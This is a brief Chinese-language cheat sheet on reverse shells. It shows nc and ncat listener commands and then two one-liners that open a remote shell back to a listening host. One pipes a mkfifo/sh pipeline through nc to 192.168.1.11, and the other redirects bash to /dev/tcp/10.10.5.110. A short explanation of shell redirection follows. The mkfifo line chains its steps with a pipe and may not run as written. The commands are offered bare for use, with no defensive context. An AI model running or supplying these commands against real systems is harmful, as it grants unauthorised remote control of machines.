监听端口

Linux使用nc监听一个tcp端口

nc -ltp 2000

Windows安装znmap，使用ncat可监听端口

ncat -ltp 2000

客户端反弹shell

使用nc反弹shell

mkfifo /tmp/p | sh -i < /tmp/p 2>&1 | nc 192.168.1.11 2000 > /tmp/p

使用socket调用方式

bash -i >& /dev/tcp/10.10.5.110/2000 0>&1

shell重定向说明

0 - stdin 代表标准输入， 使用< 或<<
1 - stdout 代表标准输出，使用> 或 >>
2 - stderr 代表标准错误输出，使用2> 或2 >>
>& - &后面接文件时，表示将标准输出和标准错误输出重定向到文件
0>&1 - 命令后面加上0>&1，表示将标准输入重定向到标准输出。